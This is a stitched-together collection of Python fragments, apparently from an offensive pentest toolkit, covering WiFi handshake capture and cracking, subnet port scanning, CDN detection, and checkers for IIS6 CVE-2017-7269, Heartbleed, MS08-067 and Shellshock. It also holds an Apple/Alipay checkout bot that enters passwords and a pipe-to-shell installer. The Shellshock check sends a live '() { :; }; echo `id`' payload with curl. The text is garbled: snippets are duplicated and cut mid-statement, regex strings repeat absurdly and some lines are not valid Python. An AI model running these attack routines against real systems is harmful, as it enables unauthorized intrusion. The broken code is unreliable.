def worker2(): # 这里进行cap包是否得到handshake的检测 # 这里用aircrack-ng来测试是否已经得到handshake握手包 while 1: # 每60s检测一次 time.sleep(10) os.system( "aircrack-ng -w /tmp/forhandshakedict.txt -b %s /tmp/*.cap | tee /tmp/xwifiresult.txt" % bssid) with open("/tmp/xwifiresult.txt", "r+") as f: content = f.read() if re.search(r"(no data)|(No valid)", content, re.I) or content == "": print( "I am sniffing a handshake but no one logins the wifi,so you have to wait,keep me running..." ) sniffPID = get_string_from_command( "ps -a | ack '\d+(?=\s+\S+\s+\d+:\d+\.\d+\sairport.*sniff)' -o" ) os.system("kill %s" % sniffPID) os.system("rm /tmp/*.cap") p1 = Process(target=worker1, args=()) p1.start() # 下面这里不能join,如果join了就会一直无法运行到下面的continue了 # p1.join() continue else: break sniffPID = get_string_from_command( "ps -a | ack '\d+(?=\s+\S+\s+\d+:\d+\.\d+\sairport.*sniff)' -o") os.system("kill %s" % sniffPID) print("Congratulations! Got handshake!")
def domain_has_cdn(self): # 检测domain是否有cdn # 有cdn时,返回一个字典,如果cdn是cloudflare,返回{'has_cdn':1,'is_cloud_flare':1} # 否则返回{'has_cdn':1,'is_cloud_flare':0}或{'has_cdn':0,'is_cloud_flare':0} import re CLIOutput().good_print("现在检测domain:%s是否有cdn" % self.domain) has_cdn = 0 # ns记录和mx记录一样,都要查顶级域名,eg.dig +short www.baidu.com ns VS dig +short baidu.com ns result = get_string_from_command("dig ns %s +short" % get_root_domain(self.domain)) pattern = re.compile( r"(cloudflare)|(cdn)|(cloud)|(fast)|(incapsula)|(photon)|(cachefly)|(wppronto)|(softlayer)|(incapsula)|(jsdelivr)|(akamai)", re.I) cloudflare_pattern = re.compile(r"cloudflare", re.I) if re.search(pattern, result): if re.search(cloudflare_pattern, result): print("has_cdn=1 from ns,and cdn is cloudflare") return {'has_cdn': 1, 'is_cloud_flare': 1} else: print("has_cdn=1 from ns") return {'has_cdn': 1, 'is_cloud_flare': 0} else: # 下面通过a记录个数来判断,如果a记录个数>1个,认为有cdn result = get_string_from_command("dig a %s +short" % self.domain) find_a_record_pattern = re.findall(r"((\d{1,3}\.){3}\d{1,3})", result) if find_a_record_pattern: ip_count = 0 for each in find_a_record_pattern: ip_count += 1 if ip_count > 1: has_cdn = 1 return {'has_cdn': 1, 'is_cloud_flare': 0} return {'has_cdn': 0, 'is_cloud_flare': 0}
def get_c_80_or_443_list(self, ip): # 得到ip的整个c段的开放80端口或443端口的ip列表 if "not found" in get_string_from_command("nmap"): #这里不用nmap扫描,nmap扫描结果不准 #os.system("apt-get install masscan") print("[-]需要安装nmap命令") return 0 scanPort = self.port print("[*]现在进行 %s 的c段开了 %s 端口机器的扫描" % (ip, scanPort)) ''' if self.http_or_https=="http": scanPort=80 print("[*]现在进行%s的c段开了80端口机器的扫描" % ip) if self.http_or_https=="https": scanPort=443 print("[*]现在进行%s的c段开了443端口机器的扫描" % ip) ''' popen = subprocess.Popen( "nmap -p %s -sS -sV -T4 -v -n --min-hostgroup 4 --min-parallelism 1024 --host-timeout 30 -Pn --open %s/24" % (scanPort, ip), stdout=subprocess.PIPE, shell=True, close_fds=True) #masscan_command = "nmap -p %d -sS -sV -T4 -v -F -n --min-hostgroup 4 --min-parallelism 1024 --host-timeout 30 -Pn --open %s/24 > ./masscan.txt" % (scanPort,ip) result, drr = popen.communicate() result = result.decode("utf-8", "ignore") allIP = re.findall("((\\d{1,3}\\.){3}\\d{1,3})", result) ipList = [] for each in allIP: ipList.append(each[0]) #print(ipList) ipList = list(set(ipList)) #去重处理 return ipList
def get_ip_from_mx_record(self): # 从mx记录中得到ip列表,尝试从mx记录中的c段中找真实ip print("尝试从mx记录中找和%s顶级域名相同的mx主机" % self.domain) import socket # domain.eg:www.baidu.com from exp10it import get_root_domain root_domain = get_root_domain(self.domain) from exp10it import get_string_from_command result = get_string_from_command("dig %s +short mx" % root_domain) sub_domains_list = re.findall(r"\d{1,} (.*\.%s)\." % root_domain.replace(".", "\."), result) ip_list = [] for each in sub_domains_list: print(each) ip = socket.gethostbyname_ex(each)[2] if ip[0] not in ip_list: ip_list.append(ip[0]) return ip_list
def get_c_80_or_443_list(self,ip): # 得到ip的整个c段的开放80端口或443端口的ip列表 if "not found" in get_string_from_command("masscan"): #这里不用nmap扫描,nmap扫描结果不准 os.system("apt-get install masscan") if self.http_or_https=="http": scanPort=80 CLIOutput().good_print("现在进行%s的c段开了80端口机器的扫描" % ip) if self.http_or_https=="https": scanPort=443 CLIOutput().good_print("现在进行%s的c段开了443端口机器的扫描" % ip) masscan_command = "masscan -p%d %s/24 > /tmp/masscan.out" % (scanPort,ip) os.system(masscan_command) with open("/tmp/masscan.out", "r+") as f: strings = f.read() #os.system("rm /tmp/masscan.out") import re allIP=re.findall(r"((\d{1,3}\.){3}\d{1,3})",strings) ipList=[] for each in allIP: ipList.append(each[0]) print(ipList) return ipList
import sys from exp10it import COMMON_NOT_WEB_PORT_LIST from exploit import get_target_open_port_list current_dir = os.path.split(os.path.realpath(__file__))[0] target = sys.argv[1] print("checking iis vul for " + target) domain = target.split("/")[-1] open_port_list = get_target_open_port_list(target) for each_port in open_port_list: if each_port not in COMMON_NOT_WEB_PORT_LIST: server_type = get_server_type(target) if not re.search(r"iis/6", server_type, re.I): continue a = get_string_from_command("cd %s && python2 iis6.py %s %s" % (current_dir, domain, each_port)) if re.search(r"HHIT CVE-2017-7269 Success", a, re.I): string_to_write = "Congratulations! 存在iis6.0远程溢出漏洞:\n%s:%s" % ( domain, each_port) CLIOutput.good_print(string_to_write) with open("%s/result.txt" % current_dir, "a+") as f: f.write(string_to_write) else: print( "coz I found no nmap scan result from database,I will test only on the default port but not test on all open ports" )
from exp10it import COMMON_NOT_WEB_PORT_LIST from exp10it import get_http_domain_from_url from exp10it import get_target_open_port_list current_dir = os.path.split(os.path.realpath(__file__))[0] target = sys.argv[1] print("checking heartbleed vul for " + target) open_port_list = get_target_open_port_list(target) http_domain = get_http_domain_from_url(target) hostname = urlparse(target).hostname target_table_name = get_target_table_name_list(target)[0] parsed = urlparse(target) open_port_list = get_target_open_port_list(target) if ":" in parsed.netloc: open_port_list.append(parsed.netloc.split(":")[1]) for each in open_port_list: if each not in COMMON_NOT_WEB_PORT_LIST: a = get_string_from_command("cd %s && python2 ssltest.py -p %s %s " % (current_dir, each, hostname)) if re.search(r"server is vulnerable", a, re.I): string_to_write = "Congratulations! heartbleed vul exists on %s:%s" % ( hostname, each) CLIOutput().good_print(string_to_write) with open("%s/result.txt" % current_dir, "a+") as f: f.write(string_to_write) else: print( "coz I found no nmap scan result from database,I will not run heartbleed vul check module on other ports" )
def buy_ipx(): if module_exist("selenium") is False: os.system("pip3 install selenium") from selenium import webdriver from selenium.common.exceptions import TimeoutException result = get_string_from_command("phantomjs --help") if re.search(r"(not found)|(不是内部或外部命令)|(Unknown command)", result,re.I): if platform.system() == "Darwin": os.system("brew install phantomjs") elif platform.system() == 'Linux': os.system("echo y | apt-get install phantomjs") elif platform.system() == 'Windows': import wget --no-cache try: wget --no-cache.download( "https://bitbucket.org/ariya/phantomjs/downloads/phantomjs-2.1.1-windows.zip", out="phantomjs.zip") except: print( "Please download phantomjs from the official site and add the executeable file to your path") input("下载速度太慢,还是手工用迅雷下载吧,下载后将可执行文件phantomjs.exe存放到PATH中,再按任意键继续...") import time from selenium.webdriver.common.by import By from selenium.webdriver.support.ui import WebDriverWait from selenium.webdriver.support import expected_conditions if proxy_url == "" or proxy_url == 0: service_args_value = ['--ignore-ssl-errors=true', '--ssl-protocol=any', '--web-security=false'] if proxy_url != "" and proxy_url != 0: proxy_type = proxy_url.split(":")[0] proxy_value_with_type = proxy_url.split("/")[-1] service_args_value = ['--ignore-ssl-errors=true', '--ssl-protocol=any', '--web-security=false', '--proxy=%s' % proxy_value_with_type, '--proxy-type=%s' % proxy_type] #service_args_value.append('--load-images=no') ##关闭图片加载 service_args_value.append('--disk-cache=yes') ##开启缓存 from selenium.webdriver.common.desired_capabilities import DesiredCapabilities dcap = dict(DesiredCapabilities.PHANTOMJS) ua = "Mozilla/4.0 (Windows; U; Windows NT 5.0; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.33 Safari/532.0" #headers = {'User-Agent': '%s' % get_random_ua(),'Cookie': '%s' % cookie} if cookie!="": headers = {'User-Agent': '%s' % ua,'Cookie': '%s' % cookie} else: headers = {'User-Agent': '%s' % ua} for key in headers: capability_key = 'phantomjs.page.custom_headers.{}'.format(key) webdriver.DesiredCapabilities.PHANTOMJS[capability_key] = headers[key] driver = webdriver.PhantomJS(service_args=service_args_value) driver.implicitly_wait(300) driver.set_page_load_timeout(300) print("目前没有登录,现在访问收藏夹,尝试跳转到登录页面") driver.get("https://www.apple.com/cn/shop/favorites") WebDriverWait(driver, 300).until( expected_conditions.element_to_be_clickable( (By.NAME, 'login-apple_id') ) ) user_text_box=driver.find_element_by_name('login-apple_id') user_text_box.clear() user_text_box.send_keys(apple_id) pass_text_box=driver.find_element_by_name('login-password') pass_text_box.clear() pass_text_box.send_keys(apple_id_pass) login_button=driver.find_element_by_id('sign-in') print("现在点击登录按钮") login_button.click() import random #driver.get_screenshot_as_file("/tmp/PhantomJSPic") title = driver.title print(title) content = driver.page_source while True: pic_links=driver.find_elements_by_class_name('relatedlink') if pic_links and len(pic_links)>0: print(len(pic_links)) break else: time.sleep(1) continue #attention!!!!!!!!这里要修改,[1]和[2]是iphonex pic_links[try_index-1].click() #driver.get_screenshot_as_file("/tmp/PhantomJSPic0") WebDriverWait(driver, 300).until( expected_conditions.element_to_be_clickable( (By.NAME, 'add-to-cart') ) ) add_to_cart_link=driver.find_element_by_name('add-to-cart') add_to_cart_link.click() print("现在加入到购物车") #driver.get_screenshot_as_file("/tmp/PhantomJSPic1") WebDriverWait(driver, 300).until( expected_conditions.element_to_be_clickable( (By.ID, 'cart-actions-checkout') ) ) jie_zhang_link=driver.find_element_by_id('cart-actions-checkout') print("现在点击结帐") jie_zhang_link.click() #driver.get_screenshot_as_file("/tmp/PhantomJSPic2") WebDriverWait(driver, 300).until( expected_conditions.element_to_be_clickable( (By.NAME, 'login-apple_id') ) ) user_text_box=driver.find_element_by_name('login-apple_id') user_text_box.clear() user_text_box.send_keys('xxx') pass_text_box=driver.find_element_by_name('login-password') pass_text_box.clear() pass_text_box.send_keys('xxx') login_button=driver.find_element_by_id('sign-in') print("现在点击登录按钮") login_button.click() driver.get_screenshot_as_file("/tmp/PhantomJSPic3") WebDriverWait(driver, 300).until( expected_conditions.element_to_be_clickable( (By.ID ,'cart-continue-button') ) ) continue_button1=driver.find_element_by_id('cart-continue-button') continue_button1.click() continue_button2=driver.find_element_by_id('shipping-continue-button') continue_button2.click() WebDriverWait(driver, 300).until( expected_conditions.element_to_be_clickable( (By.ID ,'payment-form-options-Alipay-0') ) ) zhifubao_button=driver.find_element_by_id('payment-form-options-Alipay-0') zhifubao_button.click() payment_continue_button=driver.find_element_by_id('payment-continue-button') payment_continue_button.click() WebDriverWait(driver, 300).until( expected_conditions.element_to_be_clickable( (By.ID ,'invoice-next-step') ) ) invoice_next_step_button=driver.find_element_by_id('invoice-next-step') invoice_next_step_button.click() WebDriverWait(driver, 300).until( expected_conditions.element_to_be_clickable( (By.ID ,'terms-accept') ) ) terms_accept_button=driver.find_element_by_id('terms-accept') terms_accept_button.click() WebDriverWait(driver, 300).until( expected_conditions.element_to_be_clickable( (By.ID ,'terms-continue-button') ) ) terms_continue_button=driver.find_element_by_id('terms-continue-button') terms_continue_button.click() WebDriverWait(driver, 300).until( expected_conditions.element_to_be_clickable( (By.ID ,'place-order-button') ) ) place_order_button=driver.find_element_by_id('place-order-button') place_order_button.click() WebDriverWait(driver, 300).until( expected_conditions.element_to_be_clickable( (By.ID ,'pay_now') ) ) pay_now_button=driver.find_element_by_id('pay_now') pay_now_button.click() WebDriverWait(driver, 300).until( expected_conditions.element_to_be_clickable( (By.ID,'J_tLoginId') ) ) zhifubao_username_box=driver.find_element_by_id('J_tLoginId') zhifubao_username_box.click() zhifubao_username_box.clear() zhifubao_username_box.send_keys(zhifubao_username) zhifubao_pass_box=driver.find_element_by_id('pay_passwd_rsainput') zhifubao_pass_box.click() #zhifubao_pass_box.clear() zhifubao_pass_box.send_keys(zhifumima) driver.get_screenshot_as_file("/tmp/PhantomJSPic4") os.system("open /tmp/PhantomJSPic4") time.sleep(3) print("现在在支付宝中确认付款") driver.get_screenshot_as_file("/tmp/PhantomJSPic5") driver.find_element_by_id('J_newBtn').click() os.system("open /tmp/PhantomJSPic5") WebDriverWait(driver, 300).until( expected_conditions.url_contains( 'standard/lightpay/light_pay_cashier.htm' ) ) tmp=driver.find_element_by_id('pay_password_rsainput') tmp.click() tmp.send_keys(zhifumima) driver.get_screenshot_as_file("/tmp/PhantomJSPic6") print("最后确认付款") tmp=driver.find_element_by_id('J_authSubmit') tmp.click()
############################################################# ### __ / _ | \_) | ### _ \\ \ / _ \ | ( || _| ### ___/ _\_\.__/_|\__/_|\__| ### _| ### ### name: 3xp10it.py ### function: exp10itScanner ### date: 2016-11-07 ### author: quanyechavshuo ### blog: http://3xp10it.cc ############################################################# import re import os import time os.system("pip3 install exp10it -U --no-cache-dir") from exp10it import figlet2file from exp10it import exp10itScanner from exp10it import get_string_from_command figlet2file("3xp10it", 0, True) time.sleep(1) a = get_string_from_command("apt list python-requests") if not re.search(r"python-requests", a, re.I): os.system("apt-get install python-requests") a = get_string_from_command("apt list python-dnspython") if not re.search(r"python-dnspython", a, re.I): os.system("apt-get install python-dnspython") exp10itScanner()
"/cgi-bin/webmail.cgi", ] target = sys.argv[1] print("checking shellshock vul for " + target) http_domain = get_http_domain_from_url(target) urls = get_target_urls_from_db(target, "exp10itdb") urls.append(target) for each_url in urls: if "^" in each_url: each_url = each_url.split("^")[0] parsed = urlparse(each_url) url = parsed.scheme + "://" + parsed.netloc + parsed.path if re.search(r"\.cgi$", url, re.I): a = get_string_from_command( "curl '%s' -A '() { :; }; echo; echo `id`' -k" % url) if re.search(r"uid=", a, re.I): string_to_write = "Congratulations! shellshock vul exists on %s\n%s" % url CLIOutput().good_print(string_to_write) with open("%s/result.txt" % current_dir, "a+") as f: f.write(string_to_write) else: print("no shellshock vul") if target[:4] == "http": hostname = urlparse(target).hostname target_table_name = get_target_table_name_list(target)[0] open_port_list = get_target_open_port_list(target) parsed = urlparse(target)
import os import re import requests os.system("pip3 install exp10it -U") from exp10it import get_string_from_command from exp10it import get_request sysinfo = get_string_from_command("uname -a") # 安装git,为了后面能安装vundle a=get_string_from_command("git help") if re.search(r"(未找到命令)|(not found)|(unknown command)",a,re.I): if re.search(r"(ubuntu)|(debain)",sysinfo,re.I): os.system("apt-get install git") if re.search(r"darwin",sysinfo,re.I): os.system("brew install git") with open("/etc/shells", "r") as f: content = f.read() pur = input("1.只更新配置文件\n2.安装zsh+vim+tmux+配置文件\n3.安装fish+vim+tmux+配置文件\ninput your choose here:>") if pur == '1': pass elif pur == '2': # 下面设置zsh为默认shell if not re.search(r"/bin/zsh", content, re.I): os.system('''echo "/bin/zsh" | sudo tee -a /etc/shells''') os.system("chsh -s `which zsh`") # 下面安装oh-my-zsh os.system('''sh -c "$(curl -fsSL https://raw.githubusercontent.com/robbyrussell/oh-my-zsh/master/tools/install.sh)" && exit''') # 上面之后要退出zsh,要不然后续的安装过程无法继续(除非人工ctrl+d) else:
# test on:macOS sierra 10.12.5 import time import os os.system("pip3 install exp10it -U --no-cache --retries 0") from exp10it import figlet2file figlet2file("xwifi", 0, True) time.sleep(1) from exp10it import get_string_from_command from exp10it import get_all_file_name from multiprocessing import Process import re import time import sys os.system("echo testfor_handshake > /tmp/forhandshakedict.txt") a = get_string_from_command("ack") if re.search(r"not found", a, re.I): input( "Please install ack first,eg.brew install ack,after you finished it,press anykey to continue." ) a = get_string_from_command("airport") if re.search(r"not found", a, re.I): a = get_string_from_command( '''find /System/Library -name "airport" | ack "^/.*/airport$"''') os.system("ln -s %s /usr/local/bin/airport" % a) #print("add your airport to path,then run me again.") a = get_string_from_command("aircrack-ng") if re.search(r"not found", a, re.I): input( "Please install aircrack-ng first,eg.brew install aircrack-ng,after you finished it,press anykey to continue."
page.open(server, 'post', data, function (status) { if (status !== 'success') { console.log('Unable to post!'); } else { console.log(page.content); } phantom.exit(); }); ''' % (qihao, ++i) while True: os.system("rm post.js") with open("post.js", "a+") as f: f.write(post_js_content) proxy_addr = get_random_proxy() print(proxy_addr) html = get_string_from_command("phantomjs post.js --proxy=%s" % proxy_addr) has_page_no = re.search(r"/(\d+)页", html) if has_page_no: break else: print("没有获取到页数,尝试再次获取...") continue page_no = has_page_no.group(1) print("期号:%s,页数:%s" % (qihao, page_no)) page_list = [] for page in range(1, int(page_no) + 1): page_list.append(str(page)) def get_page_content(page): data = "page_no=%s&issue_number=%s&apply_code=" % (page, qihao)
def domain_has_cdn(self): # 检测domain是否有cdn # 有cdn时,返回一个字典,如果cdn是cloudflare,返回{'has_cdn':1,'is_cloud_flare':1} # 否则返回{'has_cdn':1,'is_cloud_flare':0}或{'has_cdn':0,'is_cloud_flare':0} import re print("[*]现在检测domain:%s是否有cdn" % self.domain) has_cdn = 0 # ns记录和mx记录一样,都要查顶级域名,eg.dig +short www.baidu.com ns VS dig +short baidu.com ns popen = subprocess.Popen("nslookup -type=ns %s" % get_root_domain(self.domain), stdout=subprocess.PIPE, shell=True, close_fds=True) #result = get_string_from_command("nslookup -type=ns %s" % get_root_domain(self.domain)) result, drr = popen.communicate() result = result.decode("utf-8", "ignore") pattern = re.compile( "(cloudflare)|(cdn)|(cloud)|(fast)|(incapsula)|(photon)|(cachefly)|(wppronto)|(softlayer)|(incapsula)|(jsdelivr)|(akamai)" "(cloudflare)|(cdn)|(cloud)|(fast)|(incapsula)|(photon)|(cachefly)|(wppronto)|(softlayer)|(incapsula)|(jsdelivr)|(akamai)" "(cloudflare)|(cdn)|(cloud)|(fast)|(incapsula)|(photon)|(cachefly)|(wppronto)|(softlayer)|(incapsula)|(jsdelivr)|(akamai)" "(cloudflare)|(cdn)|(cloud)|(fast)|(incapsula)|(photon)|(cachefly)|(wppronto)|(softlayer)|(incapsula)|(jsdelivr)|(akamai)" "(cloudflare)|(cdn)|(cloud)|(fast)|(incapsula)|(photon)|(cachefly)|(wppronto)|(softlayer)|(incapsula)|(jsdelivr)|(akamai)" "(cloudflare)|(cdn)|(cloud)|(fast)|(incapsula)|(photon)|(cachefly)|(wppronto)|(softlayer)|(incapsula)|(jsdelivr)|(akamai)" "(cloudflare)|(cdn)|(cloud)|(fast)|(incapsula)|(photon)|(cachefly)|(wppronto)|(softlayer)|(incapsula)|(jsdelivr)|(akamai)" "(cloudflare)|(cdn)|(cloud)|(fast)|(incapsula)|(photon)|(cachefly)|(wppronto)|(softlayer)|(incapsula)|(jsdelivr)|(akamai)" "(cloudflare)|(cdn)|(cloud)|(fast)|(incapsula)|(photon)|(cachefly)|(wppronto)|(softlayer)|(incapsula)|(jsdelivr)|(akamai)" "(cloudflare)|(cdn)|(cloud)|(fast)|(incapsula)|(photon)|(cachefly)|(wppronto)|(softlayer)|(incapsula)|(jsdelivr)|(akamai)" "(cloudflare)|(cdn)|(cloud)|(fast)|(incapsula)|(photon)|(cachefly)|(wppronto)|(softlayer)|(incapsula)|(jsdelivr)|(akamai)" "(cloudflare)|(cdn)|(cloud)|(fast)|(incapsula)|(photon)|(cachefly)|(wppronto)|(softlayer)|(incapsula)|(jsdelivr)|(akamai)" "(cloudflare)|(cdn)|(cloud)|(fast)|(incapsula)|(photon)|(cachefly)|(wppronto)|(softlayer)|(incapsula)|(jsdelivr)|(akamai)" r"(cloudflare)|(cdn)|(cloud)|(fast)|(incapsula)|(photon)|(cachefly)|(wppronto)|(softlayer)|(incapsula)|(jsdelivr)|(akamai)", re.I) cloudflare_pattern = re.compile( "cloudflare" "cloudflare" "cloudflare" "cloudflare" "cloudflare" "cloudflare" "cloudflare" "cloudflare" "cloudflare" "cloudflare" "cloudflare" "cloudflare" "cloudflare" r"cloudflare", re.I) if re.search(pattern, result): if re.search(cloudflare_pattern, result): print("has_cdn=1 from ns,and cdn is cloudflare") return {'has_cdn': 1, 'is_cloud_flare': 1} else: print("has_cdn=1 from ns") return {'has_cdn': 1, 'is_cloud_flare': 0} else: # 下面通过a记录个数来判断,如果a记录个数>1个,认为有cdn result = get_string_from_command("nslookup -type=a %s" % self.domain) find_a_record_pattern = re.findall("((\\d{1,3}\\.){3}\\d{1,3})", result) #print(find_a_record_pattern) if find_a_record_pattern: ip_count = 0 for each in find_a_record_pattern: ip_count += 1 if ip_count > 1: has_cdn = 1 return {'has_cdn': 1, 'is_cloud_flare': 0} return {'has_cdn': 0, 'is_cloud_flare': 0}
# This debug.py is for developers.Do not run it if you just want to run 3xp10it but not develop it. import os import re import sys exp10it_module_path = os.path.expanduser("~") + "/mypypi" sys.path.insert(0, exp10it_module_path) from exp10it import execute_sql_in_db from exp10it import get_string_from_command from exp10it import CONFIG_INI_PATH if os.path.exists(CONFIG_INI_PATH): db_name = "exp10itdb" a = input("1.删除config.ini和exp10itdb\n2....\n>") if a == '1': result = get_string_from_command("mysql") if re.search(r"Can't connect", result, re.I): os.system("service mysql start") execute_sql_in_db("drop database %s" % db_name) os.system("rm %s" % CONFIG_INI_PATH) else: print("%s not exist" % CONFIG_INI_PATH)
import os import sys exp10it_module_path = os.path.expanduser("~") + "/exp10it" sys.path.insert(0, exp10it_module_path) import re import time from urllib.parse import urlparse from exp10it import get_string_from_command from exp10it import CLIOutput target = sys.argv[1] print("checking ms08-067 vul for " + target) current_dir = os.path.split(os.path.realpath(__file__))[0] current_log_file = "/tmp/commix_" + str(time.time()) if target[:4] == "http": target = urlparse(target).hostname cmd = "nmap --script=smb-vuln-ms08-067 %s 2>&1 | tee %s" % (target, current_log_file) a = get_string_from_command(cmd) if re.search(r"VULNERABLE", a, re.I): os.system("mv %s %s/result.txt" % (current_log_file, current_dir)) CLIOutput().good_print("Congratulations! MS10-010 exists on %s" % target) else: os.system("rm %s" % current_log_file)
page.open(server, 'post', data, function (status) { if (status !== 'success') { console.log('Unable to post!'); } else { console.log(page.content); } phantom.exit(); }); ''' % (qihao, ++i) while True: os.system("rm post.js") with open("post.js", "a+") as f: f.write(post_js_content) proxy_addr = get_random_proxy() print(proxy_addr) html = get_string_from_command( "phantomjs post.js --proxy=%s" % proxy_addr) has_page_no = re.search(r"/(\d+)页", html) if has_page_no: break else: print("没有获取到页数,尝试再次获取...") continue page_no = has_page_no.group(1) print("期号:%s,页数:%s" % (qihao, page_no)) page_list = [] for page in range(1, int(page_no) + 1): page_list.append(str(page)) def get_page_content(page): data = "page_no=%s&issue_number=%s&apply_code=" % (page, qihao)